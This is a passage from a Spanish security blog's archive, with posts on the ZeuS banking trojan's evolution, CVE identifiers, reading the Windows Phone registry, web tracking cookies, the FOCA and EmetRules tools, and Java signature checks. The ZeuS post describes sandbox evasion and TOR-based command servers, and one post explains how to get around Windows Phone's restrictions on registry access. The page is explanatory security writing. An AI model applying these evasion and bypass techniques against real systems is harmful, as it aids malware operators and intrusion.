La industria del malware necesita mejorar y seguir robando. Así que investigan e invierten. Hay dos formas diferentes de invertir si estás "en el negocio": una es invertir en nuevas vulnerabilidades para poder infectar más eficientemente. Esto es complicado y no hablaremos de ello en esta entrada. La otra vía de inversión está en cómo robar de forma más eficiente cuando la víctima ya está infectada. ¿Qué han hecho al respecto últimamente? ¿Cuál es el troyano bancario más lucrativo? Existen millones de troyanos bancarios. Más de los que probablemente podamos imaginar y más de los que las casas antivirus pueden manejar. Pero la mayoría de ellos tienen mucho en común. Básicamente en sus objetivos (robar, cuanto más mejor) y en la manera en la que llegan y se quedan en el sistema. Simplificando mucho, el troyano más lucrativo es el llamado "ZeuS" o "Zbot", nacido a finales de 2005. Zeus, dependiendo de con quién se hable, es una cosa u otra. Su historia es lo suficientemente larga como para cubrir filtraciones de código, mutaciones, copias... Para esta entrada, ZeuS es básicamente una filosofía y una plantilla. Una "plantilla" porque permite, con un programa, crear un troyano bancario con objetivos a demanda, con su propia sintaxis y reglas. Un kit de "Hágalo usted mismo" con funcionalidades muy avanzadas. Es también una "filosofía" por la forma en la que roba, que podría ser considerada un estándar hoy. ZeuS consolidó un estilo en los troyanos bancarios. Lo que hace, y la base de su éxito es (entre muchas otras cosas): Se inyecta en el navegador, para modificar lo que el usuario ve realmente en su pantalla. Inyecta nuevos mensajes o campos y modifica el comportamiento o envía los datos relevantes al atacante. Si no puede o no sabe inyectar nada, captura y envía al atacante el tráfico https. De esta forma y con esta estructura básica, ZeuS (como concepto) ha estado vivo y coleando durante 8 años ya. Existen malware con diferentes nombres, pero fundamentalmente, siguen algunas de estas pautas de estilo. Uso de navegadores. La versión de Chrome de 64 bits está prácticamente en desarrollo en Windows. La de Firefox de 64bits para Windows incluso se canceló temporalmente ¿En qué están invirtiendo? ZeuS ha evolucionado técnicamente, pero ha mantenido su estructura "básica". ¿Existe una rama "oficial" de ZeuS? Sí, se puede comprar, pero hay "forks" y variantes que se han convertido a su vez en estándares. Aparecen funcionalidades cada cierto tiempo y otros grupos de atacantes las adoptan, copian o compran. Centrándonos en los últimos cambios más interesantes que han sido noticia últimamente, los más significativos son : Usar TOR para comunicarse con su servidor centra l (command and control) y versiones de ZeuS compiladas directamente para 64 bits. Aunque no se han visto "in the wild", esto mejora drásticamente las capacidades de ZeuS. Uno de los puntos débiles (y a su vez, ventajas) de ZeuS (y del malware en general hoy en día) es que depende de servidores externos. Una vez que estos servidores no están disponibles, el troyano es fundamentalmente inútil. Para solucionar esto, los atacantes han usado hasta ahora dominios dinámicos, generadores de dominio, técnicas de "fast flux" en los DNS, hosting a prueba de balas.... y todas estas técnicas son válidas pero resultan "caras". Usar TOR y dominios .onion les proporciona una resistencia más "barata". Cerrar, detectar o investigar estos servidores será mucho más complicado para los "buenos", y para los atacantes resultará mucho más sencillo conservar esta estructura más "resiliente". Por otro lado, crear versiones nativas para 64 bits requiere una explicación previa. Hoy, una buena parte de sistemas Windows son de 64 bits. En esta arquitectura, las aplicaciones de 64 bits y la mayoría de las de 32 (excepto los drivers) funcionan sin problemas. Por eso hoy, muchos programas siguen siendo compilados para 32 bits, y así pueden correr en XP (cuya versión de 64 bits no es muy usada) y el resto (que sí son en su mayoría de 64 bits). Los programadores, para facilitar la compatibilidad, compilan para 32 bits. Y así lo hace el malware también. Hoy incluso con sistemas operativos de 64 bits, los navegadores suelen ser de 32 (incluso Internet Explorer, que viene con versión de 32 y 64 en los últimos Windows). La razón es para mantener compatibilidad con los plugins y extensiones del navegador que son aún de 32 bits. Entonces, ¿por qué crear malware que solo funcionaría en navegadores de 64 bits? Porque pueden. Quizás están experimentando en estos momentos, preparándose para el futuro próximo. De hecho, la versión de ZeuS de 64 bits se ha encontrado "dentro" de una versión de 32. Esto significa que, una vez infectado, usa una u otra dependiendo del navegador. Quizás no encuentren a muchas víctimas usando exclusivamente navegadores de 64 bits (el 0,01% de usuarios usan IE nativo de 64 bits), pero es un mercado que no quieren dejar de lado, y para cuando aumente (los navegadores ya hacen esfuerzos para disponer de versiones nativas de 64 bits que terminarán por imponerse), quieren que su software esté preparado. Puede que haya otra razón. Usar versiones de 64 bits puede permitirles pasar más inadvertidos en las sandboxes de los investigadores y casas antivirus. La detección para la mayoría de las casas antivirus pasa por este circuito: sandbox y, si es sospechoso, análisis más profundo y, si sigue siendo sospechoso pero no se ha clasificado todavía dentro de ningún grupo, análisis manual. XP es un sistema muy utilizado como sandbox todavía. Las versiones nativas de 64 bits de malware no funcionarán en ese entorno. Pero esto depende mucho de los recursos de las casas antivirus y sus métodos más o menos sofisticados. ¿Qué significan estos cambios? Que los programadores de troyanos bancarios no temen a los usuarios y solo un poco las casas antivirus. Su única limitación son sus propias capacidades técnicas. Que, si les apatece, son más proactivos que cualquier otra industria. Y que quieren el pastel completo de usuarios para robarles todo lo posible. Sergio de los Santos ssantos@11paths.com @ssantosv
7 de enero de 2014
Ocho siglas relacionadas con las vulnerabilidades (I): CVE
Uno de los factores críticos sobre el que gira el mundo de la seguridad es el estudio y control de vulnerabilidades. Para ello existen organizaciones encargadas de tratar temas relacionados a este aspecto, como es el caso de MITRE, FIRST e ICASI. Veremos que estándares utilizan y cómo aprovecharlos para entender mejor los problemas de seguridad. MITRE es una organización sin ánimo de lucro que gestiona los CVE. Opera en centros de investigación y desarrollo encargados del estudio de distintos campos entre los que se encuentra la seguridad de la información. En la práctica, se encarga de registrar y oficializar todos los datos relativos a vulnerabilidades, debilidades y ataques conocidos en el mundo de la seguridad. Toda esta información es de carácter público y puede ser consultada libremente. Qué es el CVE CVE (Common Vulnerabilities and Exposures) es una lista de vulnerabilidades de seguridad de la información públicamente conocidas. Es quizás el estándar más usado. Permite identificar cada vulnerabilidad, asignando a cada una un código de identificación único. Se conoce como identificador CVE (CVE-ID) y está formado por las siglas de este diccionario seguidas por el año en que es registrada la vulnerabilidad o exposición y un número arbitrario de cuatro dígitos. Estos tres elementos van separados por un guion resultando un identificador con el siguiente formato: Este formato se ha mantenido durante muchos años, pero hoy las cosas han cambiado. Aunque aún no ha dado esta circunstancia, catalogar 9.999 vulnerabilidades en un año, parece que se han quedado corto. Así que desde el primero de enero de 2014 este identificador puede contener más de cuatro dígitos para su asignación a la vulnerabilidad. Lo que esto quiere decir es que si a partir de 2014, el rango de 0001 – 9999 no fuese suficiente, se podrán añadir oficialmente más dígitos según sea necesario sin romper el estándar. Se agregarán los dígitos a la derecha del número de vulnerabilidad. Los CVE-ID con cinco o más dígitos solo serán utilizados para representar vulnerabilidades que superen la barrera del 9999. Ventajas del CVE La utilidad de este catálogo es múltiple: Permite tener una base para la evaluación de las vulnerabilidades. Es un estándar muy adoptado para referirse a ellas. En la mayoría de las ocasiones, la asignación de un CVE permite diferenciar vulnerabilidades que, de otra forma, resultarían muy complejas de describir y diferenciar desde un punto de vista técnico. Realiza un proceso de actualización continua de las vulnerabilidades registradas en la lista. La posibilidad de monitorizar cambios o actualizaciones sobre la lista y los contenidos de las vulnerabilidades. Una revisión exhaustiva de las nuevas vulnerabilidades que podrán ser registradas en el diccionario. Cómo registrar una nueva vulnerabilidad en CVE Para registrar una vulnerabilidad en esta lista se debe presentar su candidatura y superar tres etapas. La primera es la de tratamiento, en la que el CVE Content Team se encarga de analizar, investigar y procesar las solicitudes de registro de nuevas vulnerabilidades para la lista CVE. La segunda etapa es la de asignación del CVE-ID, que puede llevarse a cabo de tres maneras distintas: Una asignación directa por parte del CVE Content Team después de que éste realice el estudio de la nueva propuesta de vulnerabilidad. Una asignación directa por parte del CVE Editor al ser difundida ampliamente una vulnerabilidad crítica. Ocurre por ejemplo cuando se descubre un fallo 0day sin claro autor definido. Si no lo asume el fabricante, es esta organización la que directamente debe asignar un CVE para identificarlo. Una reserva de un identificador CVE-ID, por parte de una organización o individuo antes de hacer la propuesta. Habitualmente, los grandes fabricantes reservan en el año un "lote" de CVE que van asignando a sus boletines de seguridad. La tercera y última etapa es la de publicación. Puede prolongarse un periodo de tiempo indefinido, ya que no solo consiste en agregar la entrada a la lista y publicarla en el sitio web del diccionario, sino que incluye también los procesos de modificación. Durante este proceso podría sufrir cambios con respecto al contenido de la descripción o incluso añadir nuevas referencias que la sustenten. Se pueden dar casos "especiales", en los que un CVE-ID puede necesitar dividirse en distintos identificadores por la complejidad de la vulnerabilidad. Aunque también podría darse el caso inverso, es decir, que varios identificadores se agrupen para formar un único CVE-ID. Es posible incluso, que algún CVE-ID sea eliminado de las listas junto con su respectivo contenido. Por ejemplo, esto puede deberse a distintos factores: Que una vulnerabilidad ya haya sido registrada bajo otro CVE-ID. Que un posterior análisis de la vulnerabilidad demuestre que en realidad no existe. Que el informe relativo a la vulnerabilidad deba ser reformulado en su totalidad. Qué información ofrece la web oficial de CVE A continuación se resaltan en la siguiente imagen los enlaces más importantes que se pueden encontrar en su página web. En el enlace Documents se pueden encontrar todos los documentos públicos relacionados con CVE. En los enlaces a Search CVE y Search NVD se pueden realizar las búsquedas de vulnerabilidades. El primero de los enlaces facilita la búsqueda a través de la lista CVE, y el otro enlace permite la búsqueda de vulnerabilidades a través de la base de datos de vulnerabilidades del NIST. En el enlace Search the Site pueden realizarse búsquedas específicas de las vulnerabilidades a través de palabras clave que puede estar contenidas en el nombre o la descripción de la vulnerabilidad sin necesidad de conocer el CVE-ID. Con el enlace NVD (National Vulnerability Database) se puede ir directamente a la página web de la base de datos de vulnerabilidades del NIST, (de la que hablaremos en una próxima entrada). En ella se puede consultar también las vulnerabilidades registradas en CVE incluyendo su valoración CVSS. Por último, con los enlaces Vulnerability Scoring System (CVSS) y Software Weakness (CWE) pueden consultarse las otras dos listas de las que también hablaremos. De cada vulnerabilidad suele recolectarse por lo general solo una escueta descripción y las referencias que comprueben y apoyen la existencia de la vulnerabilidad. Las referencias pueden ser publicaciones o entradas de foros o blogs en donde se han hecho públicas las vulnerabilidades y demostraciones de su explotación. Además suele también mostrarse un enlace directo a la información de la base de datos de vulnerabilidades del NIST (NVD), en la que pueden conseguirse más detalles de la vulnerabilidad y su valoración. * Ocho siglas relacionadas con las vulnerabilidades (II): CWE y CAPEC * Ocho siglas relacionadas con las vulnerabilidades (III): CVSS * Ocho siglas relacionadas con las vulnerabilidades (IV): CWSS Umberto Francesco Schiavo umberto.schiavo@11paths.com
3 de enero de 2014
Accediendo (y "hackeando") el registro de Windows Phone
Aunque Microsoft se esfuerza en proteger Windows Phone 8 de los hacks de la comunidad, acceder al registro de los dispositivos todavía es posible con algunas limitaciones. Escribir en el registro está denegado por defecto, pero los permisos de lectura son bastantes laxos. Primera aproximación Si se quiere intentar leer el registro, la primera aproximación puede ser invocar a una librería a bajo nivel de las API WIN32, como puede ser winreg.h e importar las funciones necesarias. Sin embargo, PInvoke/DllImport no está disponible en Windows Phone, así que se tendría que implementar desde cero. No hace falta decir que esto viola los requerimientos de Microsoft para subir una aplicación a la Store. Pero investigando un poco, podemos encontrar que una buena parte del trabajo ya está hecho y disponible para descarga desde el foro "XDA Developers". Es posible aprovechar un proyecto llamado "Native Access" de GoodDayToDie que hace exactamente eso. Sin embargo compilarlo y usarlo no es trivial, así que vamos a documentar un poco cómo hacerlo. Dependencias El código fuente del proyecto puede ser descargado desde esta dirección: http://forum.xda-developers.com/showthread.php?t=2393243. Para compilar el proyecto, es necesario hacerse con las librerías de referencias y convertir algunas DLL del teléfono en formato .lib usando, por ejemplo, dll2Lib (disponible en este enlace: https://github.com/peterdn/dll2lib) . En realidad, las librerías necesarias están en el directorio system32, pero utilizar las del emulador no va a funcionar en un teléfono real. Así que se necesitarán imágenes de dispositivos reales y extraer de ellas las DLL. Hay imágenes ISO de teléfonos reales disponibles "ahí fuera", así que en realidad no es difícil extraerlas y conseguirlas. Una vez hecho, es necesario, además, poner las librerías .LIB extraías en el directorio Libraries del SDK de WP8 (normalmente en Program Files (x86)Microsoft SDKsWindows Phonev8.0Libraries). Problemas compilando Sin embargo, si tienes problemas compilando el código, se puede tomar un atajo si se referencia el fichero .winmd de un proyecto ya existente que use Native Access (por ejemplo WebAcess). Se debe extraer el contenido del fichero XAP (que no es más que un zip) y buscar "Registry.dll" que ya es una versión compilada del proyecto. Ahora ya estamos listos para usar la librería y escribir el código para buscar claves en el registro. La clase proporciona todos los métodos necesarios para acceder al registro: ReadDWORD, ReadString, ReadMultiString, ReadBinary, ReadQWORD, GetHKey, GetSubKeyNames, GetValues … Un ejemplo real Aquí están los códigos para acceder a las diferentes ramas: 80000000 -> HKEY_CLASSES_ROOT 80000001 -> HKEY_CURRENT_USER 80000002 -> HKEY_LOCAL_MACHINE 80000003 -> HKEY_USERS 80000004 -> HKEY_PERFORMANCE_DATA 80000005 -> HKEY_CURRENT_CONFIG Ejemplo de código para acceder al registro de Windows Phone 8 Para acceder a algunos puntos del registro que son muy sensibles, o para crear claves, se necesitarán ciertas capacidades especiales. Por ejemplo conseguir interop-unlock que por ahora solo se ha hecho en dispositivos Samsung que aprovechan la "Diagnosis tool" de la marca. Tero de la Rosa tero@11paths.com
28 de diciembre de 2013
Sobre cookies y sistemas de seguimiento (y II)
El tracking o seguimiento a través de web, consiste en intentar identificar al usuario que está navegando y recopilar la mayor información posible sobre él creando un perfil. Con este perfil, se podrá tratar al usuario como receptor de una publicidad más personalizada y por tanto, efectiva. Veamos las propuestas de diferentes fabricantes para "solucionar" este problema, y realizar un tracking más efectivo de los usuarios. Google Desde hace algunos años, Google posee doubleclick.com, una de las mayores empresas de publicidad de internet. La compró en 2008 por 3.000 millones de dólares. Está presente en una inmensa mayoría de webs que se visitan. Esta ubicuidad, a efectos prácticos, permite a Google rastrear y evaluar qué anuncios debe mostrar basándose en el perfil de navegación recopilado. Fuente: Wall Street Journal Cada perfil se relaciona con un ID almacenado en la cookie de doubleclick.com. Pero este "viejo método" es fácilmente eludible por el usuario, que puede deshabilitar las cookies de terceros, por ejemplo. Una evolución por parte de Google es su empeño en que realicemos las búsquedas cuando ya estamos presentados (hemos hecho el log in) en su domino, con lo que puede también recabar información sobre el usuario que realiza las consultas. Pero Google planea cambiar el método de tracking con third party cookies a un ID único que lleve el navegador o el dispositivo. Esto permite una mayor persistencia además de poder unificar la información de varios dispositivos. Así podría seguir recopilando información para el perfil tanto desde el ordenador como desde otros dispositivos móviles. Esta idea ya se está llevando a cabo en los nuevos dispositivos que usan Android 4.4 (Kitkat). En ellos ya se puede ver el Advertisement id. De momento solo aplicable para las apps y Google Play: Advertising ID en los nuevos Androids Como se muestra en la imagen, el usuario puede deshabilitar y restablecer el identificador. La idea es implantar este AdID en los navegadores y dispositivos de Google, con lo que se generaría un "gran perfil" incluso entre varios dispositivos. Con AdID, Google promete traer mayor privacidad y control, permitiendo a través de las opciones del navegador o dispositivo controlar qué entidades acceden a los datos. Además no todas las entidades podrían acceder a la información recopilada, solo las que cumplan con ciertas "normas". Pero aunque AdID se considere un identificador anónimo para mostrar publicidad acorde a los gustos del usuario, no deja de tratarse de un sistema de seguimiento que podría llegar a vincularse con otros productos de Google como GMail o Google Plus, pudiendo identificar al usuario. De popularizarse, AdID daría a Google más poder y control de información. Apple Safari, tanto en su versión de escritorio como móvil, implementa por defecto la política de desactivar las cookies de terceros. Por otro lado, en los dispositivos iOS existen varias opciones de tracking de ubicación, búsquedas o aplicaciones que pueden ser desactivadas o activadas a elección del usuario, aunque por defecto estén activadas. Pero aunque Apple no permita cookies de terceros en su navegador, sí que implementa su propio ID For Advertisement (IFA o IDFA) que actúa como identificador para la publicidad de las aplicaciones en los dispositivos móviles. En anteriores versiones se conocía como UDID. Desde iOS 6 en adelante, aparece la opción de privacidad en el menú de ajustes que permitirá al usuario limitar o restablecer este identificador: Menú de ID for Advertisement en iOS Facebook Facebook usa cookies de terceros en los elementos integrados en las webs, como el conocido botón de "Like!" o píxeles transparentes para realizar el seguimiento. Obviamente, Facebook es capaz de relacionarlo directamente con el perfil, puesto que el identificador de sesión de Facebook se envía en la cookie. Además Facebook es capaz de rastrear al usuario incluso después de cerrar la sesión. Esto ocurre porque existen elementos en la cookie que no varían tras cerrar la sesión, permitiendo identificar al usuario que previamente inició y cerró sesión. Cookies de Facebook antes y después de cerrar sesión Microsoft Por otro lado Microsoft propone una alternativa parecida a Google, creando un ID de dispositivo para sus productos Windows, Windows Phone, Xbox, IE y Bing permitiendo conocer los gustos a través de estas plataformas. Todavía no se ha revelado demasiada información de cómo funcionaría. Aquí, realizaban una pequeña comparativa entre los métodos. Do not track... ¿la solución? Hace ya algún tiempo (2001) se introdujo una opción en los navegadores llamada " Do not track" (DNT), que incluye un flag o header en todas las peticiones realizadas por el navegador para evitar que se realice el tracking. Sin embargo, queda en la mano del servidor valorar esta opción o no. Ejemplo de cliente enviando la cabecera Do Not Track Actualmente todos los navegadores populares como IE, Firefox, Chrome, Safari y Opera implementan la función DNT y se puede configurar fácilmente en el apartado de preferencias de cada navegador. Internet Explorer es el único que lo implementa por defecto. Configuración de "Do Not Track" en diferentes navegadores * Sobre cookies y sistemas de seguimiento (I) Oscar Sánchez oscar.sanchez@11paths.com
18 de diciembre de 2013
FOCA Final Version, la FOCA definitiva
A todos os suena la FOCA. Durante estos años, ha tenido una gran aceptación y se ha convertido en una herramienta muy popular. Pero Eleven Paths ha matado a la FOCA y la ha convertido en un servicio muy especial, FaasT. Sin embargo, la FOCA no ha muerto. FOCA Pro es ahora una versión portable llamada FOCA Final Version se puede descargar gratuitamente. FOCA Free vs. FOCA Pro Solía existir la FOCA Free y la FOCA Pro. La versión Pro incluía algunas funcionalidades extra como reportes, análisis de mensajes de error en las repuestas, fuzzing de URLs buscando errores de conversión de tipos en PHP, errores de sintaxis en consultas SQL/LDAP, errores de desbordamiento de enteros y más paralelismo en su core. Tampoco contenía anuncios. Pero ahora, FOCA se une en una única versión, basada en la FOCA Pro, pero gratuita. Así que aquí está FOCA Final Version. Esta versión final incluye todos los plugins disponibles y la posiblidad de crear otros propios. También se han corregido ciertos errores que habían reportado los usuarios. Si quieres saber cómo funciona, podéis comprar este libro sobre pentesting con FOCA. FOCA Final Version FOCA se puede descargar gratuitamente sin necesidad de registro desde la página de Eleven Paths Labs. Esperamos que la disfrutéis.
16 de diciembre de 2013
Sobre cookies y sistemas de seguimiento (I)
El tracking o seguimiento a través de la web, consiste en intentar identificar al usuario que está navegando y recopilar la mayor información posible sobre él creando un perfil. Con estos datos, se podrá tratar al usuario como receptor de una publicidad más personalizada y por tanto, efectiva. La información que maneja el usuario puede ser catalogada y almacenada en un perfil que le identifique por sus búsquedas, ubicación u horario en que usa una u otra web. A medida que se "dispersa" el acceso a internet (ha pasado del PC a los móviles y tabletas e incluso consolas y televisión), se hace más interesante para los anunciantes técnicas que permitan identificar al usuario en cualquier parte. Veamos las propuestas de diferentes fabricantes para "solucionar" este problema, y realizar un tracking más efectivo de los usuarios. El origen, las cookies Las cookies fueron el primer método de "rastreo" utilizado. Una cookie es una pequeña porción de información (texto codificado como se desee) que el servidor crea en el navegador y almacena en local. En esa porción de datos (texto) se almacena temporalmente con una relación clave-valor. Solo un dominio puede acceder a su cookie establecida por él previamente. Protocolo básico de intercambio de cookies Gestión y visionado de cookies con Cookie Manager Las cookies se usan para identificar a un usuario después de un login o incluso para guardar información sobre preferencias de la navegación. Aunque en teoría, una cookie establecida por un dominio solo puede ser accedida por ese dominio, el hecho de incrustar un mismo dominio en diferentes páginas (a través de servidores de anuncios compartidos, por ejemplo ) permite saber a qué páginas accede un usuario si comparten estos dominios. Estas son las conocidas como third party cookies (de terceros) que guardan o usan información sobre el usuario sin que este navegue directamente por ellas, aprovechando que la web embebe o incrusta página a través de una etiqueta img o iframe (por ejemplo), normalmente usado para ofrecer publicidad inteligente acorde con los gustos del usuario. Entre la información que es posible recopilar sobre el usuario, destaca el navegador que usa, la ubicación geográfica desde donde se navega, horarios de uso, el idioma y los sitios por los que navega, así como los gustos y aficiones de este. Si se ha buscado en una tienda online algún producto, esa información queda en la cookie de esa tienda online. Pero si otra web cualquiera incrusta en ella publicidad que permite acceder a esa cookie, sabrá qué productos de la tienda se han visitado previamente y aparecerá publicidad relacionada. Ejemplo de dominio insertado en dos páginas diferentes, ofreciendo información Una prueba de concepto muy simple es limpiar los datos de navegación y buscar algún producto en un buscador y visitar alguna tienda. Es más que probable que en la próxima web que se visite, la publicidad esté relacionada con lo buscado previamente. Si la web no tiene suficiente información mostrara publicidad genérica o relacionada con la web visitada. La mayoría de los navegadores ya permiten bloquear las third party cookies que no es más que no aceptar cookies de un dominio incrustado en otro. Solo se aceptarán las del dominio principal que se visite. Una de las empresas más importantes que usa esta técnica es DoubleClick, adquirida por Google. Para consultar el perfil que ha generado Google y DoubleClick es posible acceder a http://www.google.com/settings/ads donde se puede observar la información relacionada con las búsquedas realizadas y la posibilidad de editar las preferencias: Página en la que es posible editar la configuración de publicidad de Google También es importante destacar que al pie de la página Google avisa de la posibilidad de inhabilitar o instalar una extensión que inhabilita DoubleClick. La ley y las cookies En la primavera del año pasado en España se obligaba a las entidades web a indicar para qué propósito se iban a usar las cookies y solicitar la confirmación al usuario. Las posibles multas van hasta los 30.000 euros para las empresas que no cumplan con la ley. Esta aplicación de la ley ha provocado que casi todas las páginas web actuales muestren un aviso del propósito de las cookies y soliciten la aprobación del usuario. Pero las empresas grandes como Google, Apple, Microsoft y Facebook tienen sus propios métodos e ideas para "mejorar" el negocio. Daremos un breve repaso en la siguiente entrada. * Sobre cookies y sistemas de seguimiento (y II) Oscar Sánchez oscar.sanchez@11paths.com
10 de diciembre de 2013
EmetRules: The tool to create "Pin Rules" in EMET
EMET, the Microsoft tool, introduced in its 4.0 version the chance to pin root certificates to domains, only in Internet Explorer. Although useful and necessary, the ability to associate domains to certificates does not seem to be very used nowadays. It may be hard to set and use... we have tried to fix it with EmetRules. To pin a domain with EMET it is necessary Check the certificate in that domain Check its root certificate Check its thumbprint Create the rule locating the certificate in the store Pin the domain with its rule Steps are summarized in this div: It is quite a tedious process, much more if your target is to pin a big number of domains at once. In Eleven Paths we have studied how EMET works, and created EmetRules, a little command line tool that allows to complete all the work in just one step. Besides it allows batch work. So it will connect to domain or list indicated, will visit 443 port, will extract SubjectKey from its root certificate, will validate certificate chain, will create the rule in EMET and pin it with the domain. All in one step. EmetRules de ElevenPaths The way it works is simple. The tools needs a list of domains, and will create its correspondent XML file, ready to be imported to EMET, even from the tool itself (command line). Some options are: Parameters: "urls.txt": Is a file containing the domains, separated by "n". Domains may have "www" on them or not. If not, EMET will try both, unless stated in "d" option (see below). "output.xml" specifies the path and filename of the output file where the XML config file that EMET needs will be created. If it already exists, the program will ask if it should overwrite, unless stated otherwise with "-s" option (see below). Options: t|timeout=X. Sets the timeout in milliseconds for the request. Between 500 and 1000 is recommended, but it depends on the trheads used. 0 (by default) states for no timeout. In this case, the program will try the connection until it expires. "s", Silent mode. No output is generated or question asked. Once finished it will not ask if you wish to import the generated XML to EMET. "e", This option will generate a TXT file named "error.txt" listing the domains that have generated any errors during connection. This list may be used again as an input for the program. "d". This option disables double checking, meaning trying to connect to main domain and "www" subdomain. If the domain with "www" is used in "url.txt", no other will be connected. If not, both will be connected. With this option, it will not. c|concurrency=X. Sets the number of threads the program will run with. 8 are recommended. By default, only one will be used. "u". Every time the program runs, it will contact central servers to check for a new version. This option disables it. Tool is intended mainly for admins or power users that use Internet Explorer and want to receive an alert when a connection to a domain is suspected to be "altered". Pinning system in EMET is far to be perfect, and even the warning displayed is very shy (it allows to get to the suspected site), but we think is the first step to what it will be, for sure, an improved feature in the future. It may be downloaded from: http://elevenpaths.com/downloads/emetrules.zip We encourage you to use it.
6 de diciembre de 2013
Cómo se comprueba la integridad de un programa en Java
Hace unos meses hablamos de cómo se comprobaba la firma digital de los ficheros ejecutables en Windows. Veamos en esta ocasión cómo funciona la firma digital de ficheros creados en Java, su estructura interna y cómo se realiza la comprobación paso a paso. Keystore de CAs en Java Los programas en Java pueden tomar forma de ficheros .jar, .apk... según se usen para ejecutables, applets, programas para Android... En realidad no son más que zips con un formato muy característico. Los ficheros de este tipo firmados, además, contienen en su interior una serie de archivos que permiten garantizar su integridad y, en cierta forma, su procedencia gracias a un certificado. Los certificados de los programas Java firmados, se validan en un "keyring" de CAs que viene de serie con la instalación de Java, y que es independiente al de Windows o del navegador Firefox, por ejemplo. Los applets, sin embargo, sí que se pueden "validar" contra el keystore de Windows. En general, la comprobación de la firma se realiza "normalmente" con la misma aplicación del SDK de Java que permite firmarlos (jarsigner), solo que modificando la opción. Por ejemplo: Ejemplo de validación de firma de un APK Lo que ofrece información sobre ficheros, la verificación, etc... pero ciertamente es una información muy pobre y peor presentada visualmente. ¿Qué está ocurriendo internamente? En realidad, varias comprobaciones diferentes. Toda la información relativa a la firma e integridad se almacena dentro, en el directorio META-INF del ZIP. Ahí se pueden encontrar varios ficheros. Vayamos por partes. Manifest.mf Es un fichero donde se incluye el hash (normalmente SHA1) de cada fichero contenido en el ZIP. El hash se codifica en base64. El formato es simple: primero unas cabeceras, y luego "Name" y SHA1-Digest (que puede ser SHA256-Digest). Por ejemplo, AfPh3OJoypH966MludSW6f1RHg4= , decodificado en hexadecimal da como resultado 01f3e1dce268ca91fdeba325b9d496e9fd511e0e que es el SHA1 de ese archivo. Abajo, en la imagen de la izquierda se observa un ejemplo real de manifiesto. Un fichero Signature File (extensión SF) También en el directorio META-INF, se encontrará un fichero con cualquier nombre, pero de extensión SF (signature file). En él se observan de nuevo unas cabeceras, y un formato muy parecido al del manifiesto, con lo que se diría que es el SHA1 de cada fichero... otra vez. Pero curiosamente, diferente al valor que se muestra en el manifiesto. En realidad, el hash que aparece el el signature file, no es el hash del fichero, sino de las tres líneas del manifiesto donde se muestra el hash. Si se almacenan tal cual las tres líneas (Name, SHA1-Digest y una en blanco) en un archivo de texto, se calcula su SHA1 y se codifica en base64, el resultado sería el que aparece en el signature file. Fichero manifiesto a la izquierda y "signature file" a la derecha de un mismo APK. En la cabecera del signature file, a través de SHA1-Digest-Manifest, se calcula al SHA1 del fichero del manifiesto. Efectivamente, en el ejemplo, Og+1qY7DjNHiykvwIOijpOUYPBI= coincide con el SHA1 en hexadecimal de archivo de manifiesto... Como el manifiesto a su vez, contiene el hash del resto de archivos, estamos de esta forma "validando" a todos los ficheros internos de una vez. Comprobando el hash del manifiesto (en el signature file), de alguna manera, comprobamos el resto de archivos. En esta imagen de ejemplo, se resume todo. El certificado Lo explicado hasta ahora cubre la integridad, pero no se ha hablado de la criptografía pública. ¿En qué punto entra el certificado? Finalmente, en el directorio META-INF se puede encontrar un fichero con extensión DSA o RSA, según se use uno u otro algoritmo de firma digital. Lo que se firmará con la clave pública del certificado, es el hash del fichero "signature file". Así se "cierra el círculo". El manifiesto mantiene un listado de todos los ficheros internos y su integridad, el "signature file", mantiene la integridad del manifiesto. Y el signature file es firmado con una clave pública. La verificación La verificación se puede observar en el propio código fuente de Java o OpenJDK o en su documentación. Resumiendo, se hace en varios pasos: 1) Se verifica la firma asímétrica del signature file (extensión .SF). Se verifica la firma RSA o DSA contra el certificado. 2) Si existe el valor "SHA1-Digest-Manifest" (u otro SHA) en el fichero SF, se comprueba que es el correcto. Con esto se asegura que el manifiesto no ha sido alterado. Si es correcto, se elude el paso siguiente (y se pasa al 4). 3) Si esa cabecera no existe, o su valor no es correcto (se asume que se ha modificado el hash del manifiesto), no se considera inválido el archivo jar o apk directamente. En realidad, se hacen dos cosas: a) Si existe la cabecera Digest-Manifest-Main-Attributes en el fichero SF, se calcula el hash de los atributos principales del manifiesto. Los "atributos principales" son esos primeros datos que aparecen en el fichero y que no corresponden propiamente a cada archivo interno. Si no es válido, la comprobación falla. b) Si no existe esa cabecera, se comprueba una a una cada entrada en el fichero SF. O sea, que el SHA1 corresponde a esas tres líneas del manifiesto. Con esto gana velocidad y eficiencia, puesto que no tiene que calcular el hash de cada fichero, sino que se fía de que el hash ya calculado en el momento de compilación y contenido en el manifiesto, no haya sido alterado. Si algo falla, la firma falla. 4) En el cuarto paso, se comprueba cada fichero, su hash real, contra el calculado en el manifiesto. El modelo en general es bastante curioso. Se puede dar el caso en el que difiera el hash real del manifiesto con el hash del manifiesto almacenado en el fichero de firmas... pero que eso no signifique que la firma no sea válida. Y esto es así porque se pueden añadir ficheros a un .jar, sin que se altere su firma. De hecho, si se usa la herramienta "jar" para añadir ficheros al programa, cambiará el manifiesto, pero no el fichero de firmas. Así que su firma con el certificado no se ve alterada y seguirá siendo válido la firma digital, aunque el ZIP en sí sea completamente diferente. Si se da el caso, para alertar de este hecho, durante la verificación simplemente se mostrará un warning de este tipo: Warning: This jar contains unsigned entries which have not been integrity-checked. Como siempre, una firma válida habla de la integridad (y posible procedencia, según el certificado) de la aplicación, pero nada de sus intenciones sobre el sistema... Sergio de los Santos ssantos@11paths.com @ssantosv
4 de diciembre de 2013
La publicidad en las apps de Google Play. Más que una "molestia"
"Google is now just an ad company". No es que sean noticias nuevas, pero ya lo afirman o cuestionan algunos abiertamente desde hace tiempo. La novedad, quizás, no es que su negocio principal sea la publicidad (no hay nada malo en eso) sino en cuestionar qué está dispuesta a sacrificar por ella. En concreto, la publicidad en Google Play puede que refleje mejor esta situación. Veamos por qué. El modelo de Google Play y los programadores El modelo de crecimiento de Google Play está claro : relajar todo lo posible las restricciones con el fin de que desarrollen para esta plataforma cuantos más programadores mejor. Desde la baja cuota de inscripción, pasando por la "simbólica" política de firma de aplicaciones y la facilidad para publicar de un día para otro sin acreditar nada, todos son métodos que fomentan su popularidad... pero también que a Google Play llegue más adware y malware (en comparación con los casi impolutos markets de Apple y Microsoft gracias a sus procesos de publicación). El modelo de los programadores, por otro lado, también está claro: aplicaciones gratuitas en su mayoría que se intentan financiar con publicidad. Bajo el calor de la demanda de estos usuarios, y la permisividad de Google Play, se han potenciado numerosas (unas 50 oficiales) "redes de publicidad" especializadas en móviles. Exactamente 